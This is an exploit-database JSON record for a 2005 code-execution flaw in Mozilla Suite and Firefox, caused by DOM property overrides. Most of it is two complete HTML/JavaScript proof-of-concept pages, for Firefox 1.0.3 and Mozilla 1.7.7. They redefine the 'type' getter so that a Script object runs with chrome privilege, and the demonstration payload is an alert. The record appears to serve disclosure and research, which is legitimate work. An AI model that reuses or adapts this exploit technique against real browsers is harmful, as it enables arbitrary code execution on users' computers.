DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:35", "references": [], "description": "\nMozilla Suite And Firefox - DOM Property Overrides Code Execution", "edition": 1, "reporter": "moz_bug_r_a4", "exploitpack": {"type": "remote", "platform": "multiple"}, "published": "2005-05-16T00:00:00", "title": "Mozilla Suite And Firefox - DOM Property Overrides Code Execution", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2005-05-16T00:00:00", "id": "EXPLOITPACK:FB226653860D66F479975C2815D2C937", "href": "", "viewCount": 4, "sourceData": "source: https://www.securityfocus.com/bid/13645/info\n\nMozilla Suite and Mozilla Firefox are affected by a code-execution vulnerability. This issue is due to a failure in the application to properly verify Document Object Model (DOM) property values.\n\nAn attacker may leverage this issue to execute arbitrary code with the privileges of the user that activated the vulnerable browser, ultimately facilitating a compromise of the affected computer.\n\nThis issue is reportedly a variant of BID 13233. Further details are scheduled to be released in the future; this BID will be updated accordingly.\n\n<html>\n<head>\n<title>Proof-of-Concept for Firefox 1.0.3 - by moz_bug_r_a4</title> \n<body>\n<script>\n// it needs chrome privilege to get |Components.stack|\nvar code = \"alert('Exploit!\\\\n\\\\n' + Components.stack);\";\nvar evalCode = code.replace(/'/g, '\"').replace(/\\\\/g, '\\\\\\\\');\nvar scriptCode = \"arguments.callee.__parent__.eval('\" + evalCode + \"');'';\";\n\nvar script = (function() {\nfunction x() { new Object(); }\nreturn new Script(scriptCode);\n})();\n\ndocument.body.__defineGetter__(\"type\", function() {\nreturn { toString : script };\n});\n\nvar event = document.createEvent(\"Events\");\nevent.initEvent(\"PluginNotFound\", true, true);\ndocument.body.dispatchEvent(event);\n</script>\n</body>\n\n-----------------------------------------------------------------------------------------\n\n<html>\n<head>\n<title>Proof-of-Concept for Mozilla 1.7.7 - by moz_bug_r_a4</title> \n<body>\n\n<div id=\"d\"></div>\n<pre>\nClick on the red box.\n</pre>\n\n<script>\n// it needs chrome privilege to get |Components.stack|\nvar code = \"alert('Exploit!\\\\n\\\\n' + Components.stack);\";\nvar evalCode = code.replace(/'/g, '\"').replace(/\\\\/g, '\\\\\\\\');\nvar scriptCode = \"arguments.callee.__parent__.eval('\" + evalCode + \"');'';\";\n\nvar script = (function() {\nfunction x() { new Object(); }\nreturn new Script(scriptCode);\n})();\n\nvar xulns = \"http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul\";\nvar node = document.createElementNS(xulns, \"input\");\n\nnode.__defineGetter__(\"type\", function() {\nreturn { toString : script };\n});\n\nnode.style.width = \"100px\";\nnode.style.height = \"100px\";\nnode.style.backgroundColor = \"#f00\";\ndocument.getElementById(\"d\").appendChild(node);\n</script>\n</body>", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645795787, "score": 1659814272}, "_internal": {"score_hash": "46e4759df47af78bff964f532919cc3e"}}

{}